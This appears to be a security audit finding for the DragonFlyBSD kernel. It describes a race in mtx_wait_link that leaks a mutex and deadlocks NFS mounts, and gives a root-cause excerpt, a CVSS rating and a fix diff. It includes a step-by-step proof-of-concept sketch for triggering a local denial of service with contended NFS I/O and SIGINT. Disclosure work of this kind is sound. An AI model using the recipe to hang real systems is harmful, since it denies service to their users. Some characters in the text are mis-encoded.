mtx_wait_link lock-leak race: chain can grant lock during mtx_delete_link window, caller returns error despite holding the lock (permanent deadlock)
| Field | Value |
|---|---|
| ID | DF-0047 |
| Status | new |
| Severity | Medium |
| CVSS 3.1 | CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H |
| CWE | CWE-362 Race Condition; CWE-667 Improper Locking |
| File | sys/kern/kern_mutex.c |
| Lines | 1002-1028 (mtx_wait_link), 925-941 (mtx_delete_link default) |
| Area | kern |
| Confidence | likely |
| Discovered | 2026-06-29 |
| Reported | pending |
Summary
When mtx_wait_link's tsleep() returns a non-zero error (EINTR from a
PCATCH signal, or EWOULDBLOCK from a timeout) and link->state is still
MTX_LINK_LINKED_* at the unlocked switch read (:1002), the code calls
mtx_delete_link (:1012). Between that read and mtx_delete_link's
acquisition of MTX_LINKSPIN, a concurrent mtx_chain_link_ex/sh (triggered
by another CPU's _mtx_unlock) can grant the lock to this exact link: it
removes the link, sets mtx->mtx_owner = link->owner,
link->state = MTX_LINK_ACQUIRED, and wakes. mtx_delete_link then sees
ACQUIRED and hits its default "no change" case (:935). But mtx_wait_link
never re-checks link->state after mtx_delete_link returns โ it falls through
to the default (:1014-1016, preserving the non-zero error) and overwrites
state to IDLE (:1023), returning EINTR/EWOULDBLOCK even though the mutex
is now exclusively held by the caller's thread. The caller, seeing a non-zero
return, does not call mtx_unlock, so the lock is permanently leaked โ every
subsequent acquisition deadlocks.
Root cause
sys/kern/kern_mutex.c:1002-1028:
switch(link->state) { /* :1002 UNLOCKED read */
case MTX_LINK_ACQUIRED:
case MTX_LINK_CALLEDBACK:
error = 0;
break;
case MTX_LINK_ABORTED:
error = ENOLCK;
break;
case MTX_LINK_LINKED_EX:
case MTX_LINK_LINKED_SH:
mtx_delete_link(mtx, link); /* :1012 may race chain grant */
/* fall through */
default:
if (error == 0) /* :1015 no re-check of state */
error = EWOULDBLOCK;
break;
}
link->state = MTX_LINK_IDLE; /* :1023 clobbers ACQUIRED */
return error; /* :1028 returns non-zero despite owning lock */
mtx_delete_link correctly handles seeing ACQUIRED (default "no change"
:935-937, since the chain already removed the link), but mtx_wait_link
does not re-check link->state afterward. tsleep can return EINTR
even when the wakeup was also called (a pending signal sets error=EINTR).
Threat model & preconditions
- Attacker position: any local user on a code path that takes a mutex with
PCATCHor a timeout. The primary in-tree caller is the NFS client socket lock (mtx_lock_ex_linkwithslpflag=PCATCH,slptimeo=2*hzatsys/vfs/nfs/nfs_socket.c:2184). A local user doing NFS I/O who receives a signal (Ctrl-C / SIGINT) at the moment the socket lock is being released by another thread can hit the race. - Privileges gained or impact: permanent kernel deadlock (local DoS) โ the leaked lock deadlocks all subsequent operations on that NFS mount, requiring a reboot to clear. Not remote on its own (needs a local signal target); the NFS path is reachable from any local user with NFS access.
- Required config or capabilities: a contended
mtx_lock_*_linkcaller withPCATCH/timeout (NFS); a local signal target. - Reachability: contended mutex acquisition + signal/timeout racing the unlock/chain-grant on another CPU.
Proof of concept (sketch)
- Local user mounts NFS and issues contended I/O (concurrent reads) contending on the NFS socket lock.
- One thread blocks in
mtx_wait_linkinsidenfs_rcvlock/nfs_sndlock(PCATCH). - Send
SIGINTto the process.tsleepreturnsEINTR. - The lock holder releases;
_mtx_unlockโmtx_chain_link_exgrants the lock to the signaled thread during itsmtx_delete_linkwindow. mtx_wait_linkreturnsEINTR; the NFS code treats it as not-acquired and does notmtx_unlock.- The socket lock is now permanently held (
MTX_EXCLUSIVE|1); all future NFS send/receive on that mount deadlocks. Repeat 1-3 to raise hit probability.
Impact
Permanent kernel deadlock (local DoS) via a lock-leak race on PCATCH/timeout
mutex acquisitions. Medium (AC:H = the race window; A:H = a full permanent
deadlock).
Recommended fix
Re-check link->state for ACQUIRED after mtx_delete_link returns in the
LINKED case, and return success so the caller unlocks:
--- a/sys/kern/kern_mutex.c
+++ b/sys/kern/kern_mutex.c
@@ -1010,6 +1010,16 @@
case MTX_LINK_LINKED_EX:
case MTX_LINK_LINKED_SH:
mtx_delete_link(mtx, link);
+ /*
+ * mtx_chain_link_{ex,sh}() may have granted us the lock
+ * (state -> ACQUIRED) while we were spinning on LINKSPIN
+ * inside mtx_delete_link(). If so we now own the lock and
+ * MUST return success so the caller unlocks it; otherwise
+ * the lock is silently leaked, deadlocking all future
+ * acquisitions.
+ */
+ if (link->state == MTX_LINK_ACQUIRED) {
+ error = 0;
+ break;
+ }
/* fall through */
default:
if (error == 0)
References
sys/kern/kern_mutex.c:1002-1028โ the un-rechecked post-mtx_delete_linkpath.sys/kern/kern_mutex.c:925-941โmtx_delete_linkdefault "no change" forACQUIRED.sys/vfs/nfs/nfs_socket.c:2184โ reachablePCATCHcaller.- CWE-362 Race Condition; CWE-667 Improper Locking.
Timeline
- 2026-06-29 Discovered during automated file-by-file audit of
sys/kern/kern_mutex.c. - pending Reported to DragonFlyBSD security contact.